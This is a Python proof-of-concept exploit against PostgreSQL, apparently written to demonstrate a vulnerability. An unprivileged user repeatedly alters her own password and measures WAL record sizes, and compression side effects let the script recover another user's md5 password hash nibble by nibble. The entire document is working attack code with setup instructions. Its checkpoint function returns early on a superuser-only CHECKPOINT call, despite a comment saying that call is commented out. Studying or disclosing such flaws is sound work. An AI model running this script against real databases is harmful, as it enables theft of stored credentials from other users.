#!/usr/bin/python3
#
# Prerequisites:
# Create a user called "eve". The script logs in as that user, and changes
# its password repeatedly. You also need to create a dummy table called
# "garbage", which is used by the script to create some dummy WAL activity.
#
# CREATE USER eve;
# CREATE TABLE garbage (t text);
# ALTER TABLE garbage OWNER To eve;
# 
#
# Usage:
# Edit the connection string below. Launch the script. It will run
# for a long time, printing out a line after each guess (after each
# checkpoint).
#
# If you want to make the script run faster, you can cheat and grant eve
# superuser privileges, and modify the perform_checkpoint function below
# to use a direct CHECKPOINT command, instead of forcing a checkpoint with
# write activity.
#
# Caveats:
# There are a lot of things that could confuse the script and stall it:
# * Concurrent update of pg_authid table
# * Other concurrent WAL activity
# * More than one other ueser on the same pg_authid page (or even a dead row)
#
import psycopg2;
import statistics;

connectstr = "host=localhost dbname=postgres user=eve";

# characters to use for padding our guesses. This needs to be non-repeating
# and not contain hex characters (0-9, a-f), to avoid compression.
paddingstr = "ABCDEFGHIJKLMNOPQRSTUVXYZghijklmnopqrstuvxyz";

# If you have an initial guess of the first N bytes, you can type it here
initial_guess = "md5";

# length of the string we're guessing.
victim_length = 3 + 32;

# How many times to repeat each guess? Increasing this makes the attack take
# longer, but makes it less likely to get confused by small random differences
# in WAL record sizes.
num_repeats = 5;



checkpoints = 0;  # how many checkpoints have we executed so far?

# Perform a checkpoint. We can't just call CHECKPOINT, because that's
# superuser-only. We resort to doing dummy activity until a checkpoint
# is triggered.
#
# There is also no direct way of detecting when a checkpoint has happened, so
# we take advantage of the WAL compression to detect that. We insert a 1k row
# that compressess well. Normally, the WAL record will take somewhat over 1k
# bytes. But just after a checkpoint has happened, a full-page image is taken,
# and full-page compression is enabled, the WAL record with the compresses to
# much less than 1k bytes.
#
def perform_checkpoint():
  global checkpoints;
  checkpoints += 1;

  # If you're testing this as superuser, you can cheat and perform direct
  # CHECKPOINT command by uncommenting this. It makes the script run *much*
  # faster.
  c.execute("CHECKPOINT");
  return;

  conn.rollback();
  conn.autocommit = True;
  c.execute("vacuum garbage");
  conn.autocommit = False;
  c.execute("SELECT pg_current_xlog_insert_location();");
  beforexlog = c.fetchone()[0];
  for i in range(0, 100000):
    c.execute("INSERT INTO garbage VALUES (repeat('x', 1000))");
    c.execute("SELECT pg_current_xlog_insert_location(), pg_current_xlog_insert_location() - %s;", [beforexlog]);
    row = c.fetchone();
    beforexlog = row[0];
    diff = row[1];
    conn.rollback();

    if diff < 1000:
      return;

# Insert dummy rows to the "garbage" table until the current XLOG insert
# position is roughly at the beginning of the page. There's a lot of slack
# here, it's enough that the insert position is somewhere fairly early
# in the page, so the the upcoming FPW record of the ALTER USER command won't
# cross the page boundary, messing with our measurements.
def switch_xlog_page():
  while True:
    c.execute("select (pg_current_xlog_insert_location() - '0/0') % 8192");
    xlogpos = c.fetchone()[0];
    if xlogpos < 1000:
      break;

    c.execute("INSERT INTO garbage VALUES ('x')");
    conn.rollback();

# Change our password, record the length of the WAL record that creats,
# and roll back.
def guess_password(guess):
  c.execute("SELECT pg_current_xlog_insert_location();");
  beforexlog = c.fetchone()[0];
  c.execute("ALTER USER eve UNENCRYPTED PASSWORD %s", [guess]);
  c.execute("SELECT pg_current_xlog_insert_location() - %s;", [beforexlog]);
  diff = c.fetchone()[0];
  conn.rollback();
  return diff;

# Change the password many times, until the page is pruned. This gives a clean
# slate for the attempt. 
def prune():
  while True:
    if guess_password('x') > 200:
      return;

def checkpoint_and_guess(pw):
  prune();
  prune();
  perform_checkpoint();
  switch_xlog_page();
  return guess_password(pw);

# Given a prefix, the next nibble, and amount of padding, construct the
# next guess.
def construct_guess(known, nibble, padding):
  if nibble == -1:
    c = 'X';
  else:
    c = hex(nibble)[2:];

  # Truncate the guess to the last 4 characters. The way the compression
  # algorithm works, it doesn't find common strings smaller than 4 bytes. So
  # by making sure the match is always at most 4 bytes long, we get the maximum
  # distance between a correct and incorrect guess. A correct guess will
  # be compressed to 1 byte, while an incorrect guess is stored uncompressed
  # as 4 bytes. The downside of this is that might get confused if there are
  # repeating patterns of 4 bytes in the victim hash - if we wanted to make
  # this more robust, we try longer strings if this method fails.
  return ("md5" + known + c)[-4:] + paddingstr[:padding];

# Find a useful amount of padding to use for the next guess.
#
# We pad the guess with N uncompressable bytes, so that the WAL record size
# of the FPW is just on the edge of an alignment boundary. That way, if we
# guess the next nibble correctly and the FPW to compresses one byte better
# than usual, that will result in the aligned WAL record to also be smaller,
# and not be masked away by the alignment padding of the WAL record size.
def find_padding(known, begin):
  prev_len = -1;
  for padding in range(begin, len(paddingstr)):
    pw = construct_guess(known, -1, padding);

    while True:
      len1 = checkpoint_and_guess(pw);
      print ("padding guess: %s - %d" % (pw, len1));
      len2 = checkpoint_and_guess(pw);
      print ("padding guess: %s - %d" % (pw, len2));
      if len1 != len2:
        continue;
      else:
        break;

    if prev_len == len1 or prev_len == -1:
      prev_len = len1;
      continue;
    else:
      return padding;
  print("Wrapped around padding. Looks like we're not making progress...");
  return find_padding(known, 0);

# Try to guess the next nibble, using 'padding' bytes of padding at the end.
def guess_set(known, padding):
  diffs = [];
  sizes = [];
  guess_totals = [];

  # Make a guess for each nibble, repeating each guess a few times to average
  # away any outliers.
  for guess in range(0, 16):
    guess_total = 0;
    for repeats in range(0, num_repeats):
      pw = construct_guess(known,guess, padding);

      while True:
        len = checkpoint_and_guess(pw);

        # Very small values are not believable. We probably didn't get a FPW.
        # Repeat.
        if len < 200:
          continue;
        break;

      diffs.append([len, guess]);
      sizes.append(len);
      print('{0:s}: WAL size {1}'.format(pw, len));
      guess_total += len;

    guess_totals.append(guess_total / num_repeats);

  # Ok, we now have the average size of the record for every possible value
  # (0-f) of the next nibble. If one of the sizes is significantly smaller
  # than the median, that's the correct nibble we're looking for. If none
  # of the nibbles seem better than the others, we're none the wise. In
  # that case, return None, and let the caller try something else.
  len_median = statistics.median(sizes);
  print("median: " + str(len_median));
  best_guess = 0;
  for i in range(0, 16):
    print("diff %s%s: %d" % (known, hex(i)[2:], guess_totals[i] - len_median));
    if guess_totals[i] < guess_totals[best_guess]:
      best_guess = i;

  if guess_totals[best_guess] < len_median - 5:
    return best_guess;
  else:
    return None;

# Try to guess the next nibble.
def guess_next_nibble(known):
  padding = 0;
  while True:
    padding = find_padding(known, padding);
    print("Attempting to guess next nibble with padding {0}".format(padding));
    best = guess_set(known, padding);
    if best != None:
      return hex(best)[2:];
    # otherwise, this guess didn't give us any new information. Try again with
    # a different amount of padding


# MAIN
conn = psycopg2.connect(connectstr);
c = conn.cursor();

print("Connected\n");

known = initial_guess;

while len(known) < victim_length:
  known = known + guess_next_nibble(known);
  print('Got next nibble. Known so far: %s (%d checkpoints)' % (known, checkpoints));
